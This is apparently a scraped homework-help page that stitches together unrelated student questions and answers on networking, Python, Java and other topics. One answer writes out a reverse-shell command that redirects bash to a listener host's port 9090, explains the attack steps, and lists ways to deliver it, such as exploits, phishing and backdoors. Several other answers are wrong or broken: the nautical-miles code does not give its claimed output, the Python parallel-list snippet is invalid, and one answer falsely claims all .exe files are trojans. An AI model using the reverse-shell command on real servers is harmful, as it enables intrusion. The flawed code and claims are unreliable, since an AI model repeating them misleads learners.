networking essentials (version 2) - modules 1 - 4: internet connection: getting online pre-test exam

Answers

Answer 1

The characteristic of a SOHO network is option D: It is a small network that connects a few computers to each other and to the internet.

What does SOHO stand for?

The SOHO network, also known as a single office, tiny office, or home office network, primarily refers to a business category with a few employees, typically between one and ten. It is a particular local area network connection, or LAN, designed for usage in small enterprises.

Therefore, based on the above, one can say that  SOHO network enables PCs in a home office or remote office to access centralized, shared services or connect to a corporate network.

Learn more about SOHO network  from

https://brainly.com/question/10674980
#SPJ1

See full question below

networking essentials (version 2) - modules 1 - 4: internet connection: getting online pre-test exam

What is a characteristic of a SOHO network?

It consists of multiple LANs with backbone infrastructure connections.

It is a large network, such as those used by corporations and schools, with hundreds or thousands of interconnected hosts.

It is a collection of interconnected private and public networks.

It is a small network that connects a few computers to each other and to the internet.


Related Questions

In a hash table both the keys and values are integers. We iterate over the key value pairs of a hash table and print each of the pairs of values in the format Key=a Value=b . Which of the following could be a valid out put?

In a hash table both the keys and values are integers. We iterate over the key value pairs of a hash

Answers

Note that the valid output with regard to the hash table is:  "Key=1, Value=10 Key=2, Value=10 Key=3, Value=100"

What is the explanation for the above response?

The correct answer is "Key=1, Value=10 Key=2, Value=10 Key=3, Value=100", as it shows a valid output for iterating over key value pairs of a hash table.

The order of the keys and values may vary, but each key should be associated with its corresponding value. Option "Key=1, Value=11" is not a valid output because it implies that there are two values associated with the same key. The other options either have duplicate keys or values, or missing keys.

Learn more about hash table at:

https://brainly.com/question/29970427

#SPJ1

Write a program that takes as input a number of kilometers and prints the corresponding number of nautical miles.

Use the following approximations:

A kilometer represents 1/10,000 of the distance between the North Pole and the equator.
There are 90 degrees, containing 60 minutes of arc each, between the North Pole and the equator.
A nautical mile is 1 minute of an arc.

An example of the program input and output is shown below:

Enter the number of kilometers: 100
The number of nautical miles is 54

Answers

In python:

kilos = int(input("Enter the number of kilometers: "))

print(f"The number of nautical miles is {round(kilos/1.852,2)}")

I hope this helps!

For an input of 100 kilometers, the program displays "The number of nautical miles is 54.00."

To convert kilometers to nautical miles based on the given approximations.

Here are the simple steps to write the code:

1. Define a function called km_to_nautical_miles that takes the number of kilometers as input.

2. Multiply the number of kilometers by the conversion factor \((90 / (10000 \times 60))\) to get the equivalent number of nautical miles.

3. Return the calculated value of nautical miles from the function.

4. Prompt the user to enter the number of kilometers they want to convert.

5. Read the user's input and store it in a variable called kilometers.

6. Call the km_to_nautical_miles function, passing the kilometers variable as an argument, to perform the conversion.

7. Store the calculated value of nautical miles in a variable called nautical_miles.

8. Display the result to the user using the print function, formatting the output string as desired.

Now the codes are:

def km_to_nautical_miles(km):

   nautical_miles = (km * 90) / (10000 * 60)

   return nautical_miles

kilometers = float(input("Enter the number of kilometers: "))

nautical_miles = km_to_nautical_miles(kilometers)

print(f"The number of nautical miles is {nautical_miles:.2f}.")

The output of this program is:

The result is displayed to the user as "The number of nautical miles is 54.00."

To learn more about programming visit:

https://brainly.com/question/14368396

#SPJ4

You are doing a multimedia presentation on World War I, and you want to use a visual aid to show the battle areas. What visual aid is best suited for this purpose?

Answers

Answer:

Map

Explanation:

I put it in on Edg and got it correct, hope this helps :)

Answer:

The correct answer is map

Explanation:

I just did the assignment on edge 2020 and got it right

In this lab, you use what you have learned about parallel lists to complete a partially completed Python program. The program should either print the name and price for a coffee add-in from the Jumpin’ Jive Coffee Shop or it should print the message "Sorry, we do not carry that.".

Answers

The given python code is given below as it makes a parallel list and prints an output.

What is Python Programming?

This refers to the high-level programming language that is used to build data structures and is object-oriented.

Hence, we can see that to use a parallel list to print a program in Python:

Python zip()

list_1 = [1, 2, 3, 4]

list_2 = ['a', 'b', 'c', 'd']

for i, j in zip (list_1, list_2):

print (j)

else

print (i) "Sorry, we do not carry that.";

Read more about python programs here:

https://brainly.com/question/26497128

#SPJ1

(problem is given by the image)

(problem is given by the image)

Answers

The program that prompts the user for three integers and displays their average as a floating point is given below:

The Code:

import java.util.Scanner;

public class ArithmeticSmallestLargest {

   public static void main(String[] args) {

       Scanner input = new Scanner(System.in);

       int num1;

       int num2;

       int num3;

       int sum;

       int average;

       int product;

       int largest;

       int smallest;

       System.out.print("Enter First Integer: ");

       num1 = input.nextInt();

       System.out.print("Enter Second Integer: ");

       num2 = input.nextInt();

       System.out.print("Enter Third Integer: ");

       num3 = input.nextInt();

       sum = num1 + num2 + num3;

       average = sum / 3;

       product = num1 * num2 * num3;

       largest = num1;

       smallest = num1;

       if(num2 > largest)

           largest = num2;

       if(num3 > largest)

           largest = num3;

       if(num2 < smallest)

           smallest = num2;

       if (num3 < smallest)

           smallest = num3;

       System.out.println("The sum is " + sum);

       System.out.println("The average is " + average);

       System.out.println("The product is " + product);

       System.out.println("Largest of three integers is " + largest + " and the smallest is "+ smallest + ".");

   }

}

Read more about java programming here:

https://brainly.com/question/18554491

#SPJ1

exe files are types of trojan and malware virus and they send you blue screen of death.

Answers

Answer:

im not 100 percent surre but i think so

Explanation:

The main storage device inside a computer where programs and files are saved is called the

Answers

Answer:

ssd or hd (you can chose) ssd and hds are bigger file sizes saving for long term data while RAM gives applications a place to store and access data on a short-term basis. It stores the information your computer is actively using so that it can be accessed quickly.

So if you buy RAM you'll get 8-32 GB of ram and if you get ssd or hd you will get around 500 GB- 2 TB (with modern storage devices)

Answer: The answer should be the hard drive.

what are the main social and cultural impacts of lot?

Answers

Internet of Things refers to the connected devices and the technology that enables communication between the devices and between them and the cloud.

What are the main social and cultural impacts of IoT?Social impacts : Reduced waste, costs, and difficulties are promised benefits of the Internet of Things (IoT). As a result, it helps to increase productivity and enables us to live a more joyful, eco-friendly, and productive life.The Internet of Things (IoT) is also having a physical impact on society. Students will have access to the most recent materials and data thanks to IoT, which will free them from reliance on outmoded textbooks.Cultural impacts: IoT can build connection networks that change how people interact. The Internet of Things is working to keep us healthier and provide better healthcare.From wearable devices that incorporate medical equipment to smart sensors that provide real-time data on illnesses and remote monitoring of vital body processes ,the cultural role of IoT is tremendous.

To learn more about Internet of Things , refer:

https://brainly.com/question/29240985

#SPJ1

I am having trouble figuring out how to write a code to complete this assignment in Python:

Implement the build_dictionary() function to build a word frequency dictionary from a list of words.

Ex: If the words list is:

["hey", "hi", "Mark", "hi", "mark"]
the dictionary returned from calling build_dictionary(words) is:

{'hey': 1, 'hi': 2, 'Mark': 1, 'mark': 1}
Ex: If the words list is:

["zyBooks", "now", "zyBooks", "later", "zyBooks", "forever"]
the dictionary returned from calling build_dictionary(words) is:

{'zyBooks': 3, 'now': 1, 'later': 1, 'forever': 1}
The main code builds the word list from an input string, calls build_dictionary() to build the dictionary, and displays the dictionary sorted by key value.

Ex: If the input is:

hey hi Mark hi mark
the output is:

Mark: 1
hey: 1
hi: 2
mark: 1

This is what I have been given:

# The words parameter is a list of strings.
def build_dictionary(words):
# The frequencies dictionary will be built with your code below.
# Each key is a word string and the corresponding value is an integer
# indicating that word's frequency.

'''your code goes here'''

# The following code asks for input, splits the input into a word list,
# calls build_dictionary(), and displays the contents sorted by key.
if __name__ == '__main__':
words = input().split()
your_dictionary = build_dictionary(words)
sorted_keys = sorted(your_dictionary.keys())
for key in sorted_keys:
print(key + ': ' + str(your_dictionary[key]))

Answers

Answer:

def build_dictionary(words):

   dic = {}

   for word in words:

       dic [word] =words.count(word)

   return(dic)

if __name__ == '__main__':

   words = input().split()

   your_dictionary = build_dictionary(words)

   sorted_keys = sorted(your_dictionary.keys())

   for key in sorted_keys:

       print(key + ': ' + str(your_dictionary[key]))

Explanation:

use the count function cause the initial input is a list.

Following are the Python program code to count the list of word in the dictionary:

Python Program to count list of words:

def build_dictionary(words):#defining the method build_dictionary that takes words as a parameter

   f = {}#defining a variable dictionary as a f

   for i in words:#defining a loop that checks dictionary value

       if (i in f):#defining an if block that check dictionary value

           f[i] += 1#addining 1 in the value of list

       else:#defining else block

           f[i] = 1#holding 1 in the list

   return f#return list value

if __name__ == '__main__':

   words = input().split()#defining a variable words that input value and splits its value

   your_dictionary = build_dictionary(words)#defining a variable your_dictionary that adds value in build_dictionary

   sorted_keys = sorted(your_dictionary.keys())#defining variable sorted_keys that sort value your_dictionary as key

   for k in sorted_keys:#defining loop that counts number of value

       print(k + ': ' + str(your_dictionary[k]))#defining print method that prints its value

Output:

Please find the attached file.

Program Explanation:

Defining the method "build_dictionary" that takes one parameter "words" in the method. Inside this method, a dictionary variable named "f" is declared in which a for loop is declared. Inside this, a conditional block is declared that counts words' value.In the next step, a constructor is declared, in which words variable is declared that input value and splits its value.In the next step, "your_dictionary" is declared that that adds value to build_dictionary, and use stored method is used that sort its value and store its value in "sorted_keys".After that, a for loop is declared that counts the "sorted_keys" dictionary value and prints its counted list value.

Find out more information about the dictionary here:

brainly.com/question/1199071

I am having trouble figuring out how to write a code to complete this assignment in Python:Implement

1. demonstrative
2. possessive

Answers

please specify more details

Question 2 Multiple Choice Worth 5 points)
(04.01 LC)
Computers take in and process certain kinds of information
O at the same rate as humans can
O in the same way humans can
much faster than humans can
O much more slowly than humans can

Question 2 Multiple Choice Worth 5 points)(04.01 LC)Computers take in and process certain kinds of informationO

Answers

Answer:

Answer:much faster than Humans can

Answer:

c

Explanation:

Local Area Networks (LANs)
1)only cover a short block
2)increase networking speed
3)take too long
4)are not used anymore

Local Area Networks (LANs)1)only cover a short block2)increase networking speed3)take too long4)are not

Answers

Answer:

increase networking speed

Explanation:

2020 edge

Answer:

increasing network speed

Explanation:

took the assignment on edge 2020 mark me as brainiest

Write a Python class, Flower, that has three instance variables of type str, int, and float, that respectively represent the name of the flower, its number of petals, and its price. Your class must include a constructor method that initializes each variable to an appropriate value, and your class should include methods for setting the value of each type, and retrieving the value of each type.

Answers

Answer:

The python class is shown on the first uploaded image

Explanation:

Write a Python class, Flower, that has three instance variables of type str, int, and float, that respectively

With the help of the network, the attacker can obtain the shell or root shell of the remote server (Linux operating system-based) through the reverse shell attack, and then get full control of the server. The typical reverse shell instruction is as follows:

/bin/bash -c "/bin/bash -i > /dev/tcp/server_ip/9090 0<&1 2>&1"

1) Please explain the meaning of 0,1,2,>, <, & represented in the above statement;
2) What does the attacker need to do on his machine in order to successfully get the shell information output on the server side? And please explain the meaning represented by /dev/tcp/server_ip/9090;
3) Combined with the above statement, explain the implementation process of reverse shell attack;
4) Combined with the relevant knowledge learned in our class, what attacking methods can be used to successfully transmit and execute the above reverse shell instruction on the server side?

Answers

1. 0 represents standard input (stdin), 1 represents standard output (stdout), 2 represents standard error (stderr), > is output redirection, < is input redirection, and & is used for file descriptor redirection.

2. In this case, the attacker should listen on port 9090 using a tool such as netcat or a similar utility.

3.Identify vulnerable system, craft reverse shell payload, deliver payload to target, execute payload to establish connection with attacker are methods for implementation.

4. Exploiting vulnerabilities, social engineering, planting malware/backdoors, compromising trusted user accounts can be used to execute the reverse shell instruction.

1. In the reverse shell instruction provided ("/bin/bash -c "/bin/bash -i > /dev/tcp/server_ip/9090 0<&1 2>&1"), the symbols 0, 1, 2, >, <, and & represent the following:

0: It represents file descriptor 0, which is the standard input (stdin).

1: It represents file descriptor 1, which is the standard output (stdout).

2: It represents file descriptor 2, which is the standard error (stderr).

: It is the output redirection symbol and is used to redirect the output of a command to a file or device.

<: It is the input redirection symbol and is used to redirect input from a file or device to a command.

&: It is used for file descriptor redirection, specifically in this case, combining stdout and stderr into a single stream.

2. To successfully get the shell information output on the server side, the attacker needs to set up a listening service on their own machine. In this case, the attacker should listen on port 9090 using a tool such as netcat or a similar utility. The "/dev/tcp/server_ip/9090" in the reverse shell instruction represents the connection to the attacker's machine on IP address "server_ip" and port 9090. By specifying this address and port, the attacker creates a connection between their machine and the compromised server, allowing the output of the shell to be sent to their machine.

3. The reverse shell attack is typically performed in the following steps:

The attacker identifies a vulnerability in the target server and gains control over it.The attacker crafts a payload that includes the reverse shell instruction, which allows the attacker to establish a connection with their machine.The attacker injects or executes the payload on the compromised server, initiating the reverse shell connection.The reverse shell instruction creates a new shell on the compromised server and connects it to the attacker's machine, redirecting the shell's input and output streams to the network connection.Once the reverse shell connection is established, the attacker gains interactive access to the compromised server, obtaining a shell or root shell, and can execute commands as if they were directly working on the server itself.

4.  Successfully transmit and execute the reverse shell instruction on the server side, the attacker can use various attacking methods, including:

Exploiting a vulnerability: The attacker can search for known vulnerabilities in the target server's operating system or specific applications running on it. By exploiting these vulnerabilities, they can gain unauthorized access and inject the reverse shell payload.

Social engineering: The attacker may use social engineering techniques, such as phishing emails or deceptive messages, to trick a user with access to the server into executing the reverse shell payload unknowingly.

Malware or backdoor installation: If the attacker already has control over another system on the same network as the target server, they may attempt to install malware or a backdoor on that system. This malware or backdoor can then be used to launch the reverse shell attack on the target server.

Compromising a trusted user account: The attacker may target and compromise a user account with privileged access on the server. With the compromised account, they can execute the reverse shell instruction and gain control over the server.

It is important to note that carrying out such attacks is illegal and unethical unless done with proper authorization and for legitimate security testing purposes.

For more questions on Linux operating system-based

https://brainly.com/question/31763437

#SPJ11

Multiple Choice
The Boolean operators include which of the following?

A. and, or, not
B. to, for, from
C. a, an, the
D. is, are, not

Answers

Answer:

a

Explanation:

Boolean Operators are simple words (AND, OR, NOT or AND NOT) used as conjunctions to combine or exclude keywords in a search, resulting in more focused and productive results. ... Proximity Operators (with, near and others) can also help you in searching.

Suppose Charlie had installed key logger software on all company computer systems and had made a copy of Peter’s encryption key. Suppose that Charlie had this done without policy authority and without anyone’s knowledge, including Peter’s. Would the use of such a tool be an ethical violation on Charlie’s part? Is it illegal? Suppose that Charlie had implemented the key logger with the knowledge and approval of senior company executives, and that every employee had signed a release that acknowledged the company can record all information entered on company systems. Two days after Peter’s call, Charlie calls back to give Peter his key: "We got lucky and cracked it early." Charlie says this to preserve Peter’s illusion of privacy. Is such a "little white lie" an ethical action on Charlie’s part?

Answers

Answer: Provided in the explanation section

Explanation:

We will follow this question carefully with a well precise answer.

I hope at the end of the day, you find this useful.

Answer to First part:

-----------------------

Here as Charlie has not taken any one's permission even policy authority so using such keylogger tool is completely ethical violation on charlie's part. Because any decession that has taken by a company its not an issue until everyone agreed to it. Because without knowledge of such software the people will not  be aware and they may get trap and also there is not any written document regarding the acknowledgement so its completely wrong or illegal to blame someone based on result of such softwares. And second illegal thing is to copy some else's encryption key because the policy should be equal to all the people and it should not be used for personal gain.

Answer to second part:

=================

No it is still not ethical action on Charle's part because the policy should be same for everyone and as Charlie is the one who installed this software so he should keep this secrate and not to misuse as its not a matter how Peter came to know his encryption key from Charlie but why should Charlie in first place copy the encryption key for peter and share the encryption code with Peter,its completely unethical.

cheers i hope this helped !!

1.Siguraduhing _______ang mga datos o impormasyong

2.Isaalang- alang ang partikular na _______ o lokasyon ng pinagmulan ng impormasyon

3.Upang matiyak na hindi ______ang mga impormasyon, maaaring magsaliksik at kilalaning mabuti ang awtor at ang kanyang mga artikulo​

Answers

Answer:

1.maayos

2. Lugar

3. mali

Explanation:

im correct if I'm rwong :-)

Hi everyone,
for my undergraduate research project, I'm looking for an R code for agglomerative clustering. Basically, I need to know what happened inside hclust method in R. I have looked everywhere but don't find a proper way to combine 2 data points that have the smallest distance. I was stuck at developing a dissimilarity matrix after the first phase of dissimilarity matrix generation(literally I have generated the first dissimilarity matrix). I'm not specifying R, if anyone could give me a solution in any language I would gratefully accept that.

Answers

Answer:

Answer is being shown in the file to the link

A ______________ deals with the potential for weaknesses within the existing infrastructure to be exploited.

Answers

Answer:

Threat assessment

Explanation:

A threat assessment deals with the potential for weaknesses within the existing infrastructure to be exploited.

Threat Assessment is further explained as the practice of determining or ascertaining the credibility and seriousness of a potential threat, and also the probability or chases of the threat will becoming a reality.

Threat assessment is separate to the more established procedure of violence-risk assessment, which seek to forcast an individual's general capacity and tendency to respond to situations violently. Instead, threat assessment aims to interrupt people on a route to commit "predatory or instrumental violence, the type of behavior connected with targeted attacks".

Answer:

Threat assessment

Explanation:

In an IT system, threat assessment is the analysis, evaluation and prevention of actions, events and operations that can greatly affect the system. It explores the potential for weaknesses within existing infrastructure to be exploited.

The threat assessment is a very important assessment that needs to be taken in virtually all domains. Here are a few reasons why it is important in an IT system;

i. Prevention of data loss

ii. Prevention of system or network of systems downtime

In carrying out threat assessment, one might need to do the following;

i. identification and prioritization of infrastructure including the software and hardware applications in the system.

ii. identification of potential threats such as system failure, natural disaster, unwanted access.

iii. identification of vulnerabilities in the system.

iv. analysing controls by determining who has access and who doesn't.

v. analysing the impact of a threat occurrence.

vi. documentation of analysis and evaluation results.

A diagram of a ten-node network that uses ten routers

Answers

The diagram of the of a ten-node network that uses ten routers is given in the image attached.

What is a node in a network?

A network node is known to be be seen as the kind of connection point that is seen amidst some network devices such as routers, printers, etc.

Note that they are known to often receive and send data from one network or endpoint to another.

Therefore, The diagram of the of a ten-node network that uses ten routers is given in the image attached.

Learn more about routers from

https://brainly.com/question/24812743

#SPJ1

A diagram of a ten-node network that uses ten routers
A diagram of a ten-node network that uses ten routers

Which describes a market research report? Select all that apply.
A record of customer names
A summary of consumer buying behaviors
A projection of future consumer buying behaviors
An analysis of consumer interests

Which describes a market research report? Select all that apply. A record of customer names A summary

Answers

Answer:

A projection of consumer buying behaviors prediction comes in various ways. It can be through collecting information through primary or secondary research such as analyzing online actions, feedback analysis, focus groups, conversational marketing, and more.

Please can someone help me with this AB + A+B

Answers

Answer:

Please specify the question, but I assume this is boolean algebra so the answer would be:

A + B

Explanation:

AB + A + B

Now we are solving the above expression using Boolean theorems:

Factoring

(1+B)A+(1+A)B

Identity Law A+1=1

1A+(1+A)B

Identity Law:A.1=1

A+(1+A)B

Identity Law A+1=1

A+1B

Identity Law:A.1=1

A+B

Explain why the scenario below fails to meet the definition of showrooming.

Situation: Maricella, a manager for an online store, wants customers to see the power of certain software packages. In order to accomplish this goal, Maricella agrees to refund 90% of the purchase price of software within seventy-two hours of purchase.

Answers

I believe it fails to meet the explanation of showrooming because rather than trying to show off the merchandise, Maricella attempts to indirectly bribe with the customers by offering a guaranteed refund. It also is not before purchase or being payed for online.

What is a customer?

A customer is a person or business that buys products or services from another business. Customers are essential to businesses because they bring in money; without them, they would be out of business. All businesses compete with one another to attract customers, whether through aggressive product promotion, price cuts to attract more customers, or the development of unique goods and experiences that customers adore. Consider businesses like Apple, Tesla, and Gοοgle.

The adage "the customer is always right" is frequently upheld by businesses because happy customers are more likely to endorse companies that meet or exceed their needs. As a result, many companies closely monitor their customer interactions to gather feedback on how to improve their product offerings. There are numerous ways to categorise customers. Customers are most frequently divided into internal and external categories.

Learn more about customers

https://brainly.com/question/4110146

#SPJ1



How do a write 19/19 as a whole number

Answers

As a whole number it is 1.0.

Answer:

1.0

Explanation:

You divide 19 by 19 and get 1

Daily requirements of 70 g of protein, 1 g calcium, 12 mg iron, and 3000 calories are needed for a balanced diet. The following foods are available for consumption with the cost and nutrients per 100 g as shown.
 
Protein
(g)
Calories
Calcium
(g)
Iron
Cost
GH¢
Brown Bread
12
246
0.1
3.2
0.5
Cheese
24.9
423
0.2
0.3
2
Butter
0.1
793
0.03
0
1
Baked Beans
6
93
0.05
2.3
0.25
Spinach
3
26
0.1
2
0.25
 
The objective is to find a balanced diet with minimum cost.
(a) Formulate a linear programming model for this problem.
(b) Use solver to find optimal solution and sensitivity report.         ​

Answers

Answer:

i think i know

Explanation:

Please send code for both index and style.

Please send code for both index and style.

Answers

please be more specific about what index and style. sorry i wasn't much help.

Select all the correct answers. Which TWO of the following are key components of a computer's central processing unit? input device output device data bus arithmetic logic unit control unit​

Select all the correct answers. Which TWO of the following are key components of a computer's central

Answers

Explanation:

Arithmetic logic unit and control unit

Hiya people. I am a game developer and I need an idea for a new game. If you have any ideas, pls feel free to tell me. Best idea gets brainliest.

Answers

Answer:

A better RPG game all the one that are existing are the same dull thing

Explanation:

Answer:

There are many ideas you can get for games but now-a-days action games are getting more fame than others such as fortnite, freefire, pubg etc. I prefer you to make a game that is relatated to action or adventure. You can make it related to zombie hunting, or online fighting games, or some adventurous games like tomb raider.

true or false. Two of the main differences between storage and memory is that storage is usually very expensive, but very fast to access.​

Answers

Answer:

False. in fact, the two main differences would have to be that memory is violate, meaning that data is lost when the power is turned off and also memory is faster to access than storage.

Type the correct answer in each box. Spell all words correctly, and use numerals instead of words for numbers. If necessary, use / for the fraction bar(s). What is the hexadecimal equivalent of the decimal number 125.28? The hexadecimal equivalent of the decimal number 125.28 is

Answers

Answer:

125.28₁₀ in hexadecimal = 7D.47AE147AE1₁₆

Step-by-Step Explanation:

To convert decimal number 125.28, we convert its integer and fraction part individually and then add them to get the equivalent hexadecimal number, as below:

To convert integer 125 to hexadecimal, follow these steps:

Divide 125 by 16 keeping notice of the quotient and the remainder. Continue dividing the quotient by 2 until you get a quotient of zero.

Then just write out the remainders in the reverse order to get the equivalent hexadecimal number.

125 / 16 = 7 with remainder 13 (D)

7 / 16 = 0 with remainder 7

Here is the answer to 125 decimal to hexadecimal number:

7D

For converting decimal fraction 0.28 to hexadecimal number, follow these steps:

Multiply 0.28 by 16 keeping notice of the resulting integer and fractional part. Continue multiplying by 16 until you get a resulting fractional part equal to zero (we calcuclate upto ten digits).

Then just write out the integer parts from the results of each multiplication to get equivalent hexadecimal number.

0.28 × 16 = 4 + 0.48

0.48 × 16 = 7 + 0.68000000000001

0.68000000000001 × 16 = 10 (A) + 0.88000000000011

0.88000000000011 × 16 = 14 (E) + 0.080000000001746

0.080000000001746 × 16 = 1 + 0.28000000002794

0.28000000002794 × 16 = 4 + 0.48000000044703

0.48000000044703 × 16 = 7 + 0.68000000715256

0.68000000715256 × 16 = 10 (A) + 0.88000011444092

0.88000011444092 × 16 = 14 (E) + 0.080001831054688

0.080001831054688 × 16 = 1 + 0.280029296875

Here is the answer to 0.28 decimal to hexadecimal number:

0.47AE147AE1

Therefore, decimal number 125.28 converted to hexadecimal is equal:

7D.47AE147AE1

Other Questions
An unknown compound is subjected to elemental analysis. The results of this test show that the compound is 83.24% nitrogen and 16.76% carbon. Determine its empirical formula In the table, identify four to five details that reflect the most important parts of the excerpt from rogue heart. Then paraphrase these details in your own words. Role of political parties in the development of a country How could you describe the changes that happen when carbon changes form from graphite to diamond -it is a chemical change, but the intensive and extensive properties of carbon will be maintained -it is a physical change, but the intensive and extensive properties of carbon will be maintained -it is a chemical change, which could change some of the intensive and extensive properties of the carbon -it is a physical change, which could change some of the intensive and extensive properties of the carbon Which of the following is in Romantic Era? *Wilhelm Richard WagnerClaude DebussyArnold SchoenbergJoseph-Maurice Ravel A meteorologist who has been analyzing weather data from the last fifty years found evidence of climate change. An ecologist has been studying deposits of pollen from the last fifty years to track the types of plants that grewin certain regions. She has also found evidence of climate change. What does this imply about science?Meteorology and ecology are the same type of scienceWhen scientific disciplines overlap, researchers should choose new topicsO Different scientific disciplines can be used to investigate similar questionsThere should be fewer sciences, as they seem to answer the same questions Assume that, on January 1, 2021, Matsui Co. paid $2,958,000 for its investment in 87,000 shares of Yankee Inc. Further, assume that Yankee has 290,000 total shares of stock issued. The book value and fair value of Yankee's identifiable net assets were both $580,000 at January 1, 2021. The following information pertains to Yankee during 2021: Net income $290,000 Dividends declared and paid $87,000 Market price of common stock on 12/31/2021 $36 /share Required:What amount would Matsui report in its year-end 2021 balance sheet for its investment in Yankee? A patient experienced great blood loss. In an attempt to quickly replenish body fluids, a volume of salt water from the dead sea (SUPER salty) equal to the blood lost was introduced directly into a blood vein. What is the most likely result of this treatment? The red blood cells are in danger of shrinking because they were subjected to a hypertonic environment. The red blood cells are unaffected because distilled water shares the same pH with the intracellular region of red blood cells. The red blood cells are in danger of bursting because they were subjected to a hypotonic environment. The red blood cells should be fine because they were subjected to an isotonic environment. what did the Child Labor Canning Industry of Maryland do in 1909 4000 families were randomly selected for a survey. 50% of them read the newspaper in nepali language, 45% read it in English language and 25% read in neither of these languages. How many families read the newspaper in both the languages? Also find the number of families who read exactly one of these papers. Required: a. Complete the sales comparison approach to value and assign an estimate of value to the subject property. b. A second approach using the cost method of valuation will also be used to estimate value. Comparing vacant lot sales in the market area indicates that the value of the lot the subject property is constructed on is $17,000. Air-conditioned space in the dwelling would cost about $36.00 per square foot to reproduce, and the garage would cost approximately $4,100 to reproduce. Complete the cost approach to value, assuming that, because the property being valued is relatively new, no depreciation of the structure is required. a group of nursing students and their professor are engaged in a service learning project and will be caring for clients in a region in which malaria transmission occurs. what medication should be administered to prevent the development of malaria? These numbers show a pattern.704, 708, 712, 716Choose the answers that explain the pattern.These numbers skip count by 4. The first number is odd. Four is even. The sum of Choose... is Choose.... So the numbers in the pattern Choose.... The stages of formation of the Psalter may be compared to a(n) _______ .mountainrivericeberglandslide Will mark brainliest to the right answer!!What has 13 hearts but no organs?Friend request me to find more riddles What is the answer for this question Which statement makes the most accurate claim about Montagu's attitudetoward men?A. Montagu's poem reflects a negative attitude toward men becauseit reveals how men hold women back in society.B. Montagu's poem reflects a negative attitude toward men becauseit makes fun of men for being pompous and foolish.O C. Montagu's poem reflects a positive attitude toward men becauseit shows how far they will go to win a woman's love.D. Montagu's poem reflects a positive attitude toward men becausethe character appreciates female beauty. Luis bought a car from a dealership that was offering a 22% discount off the original price c. Which of the following represents the total amount after the discount for Luiss car before taxes?A) 0.22cB) 0.78cC) 78c A car does 100 laps on a circular track of length 10 km. The distance and displacement for the car are Pls help just please will mark BRAINLIEST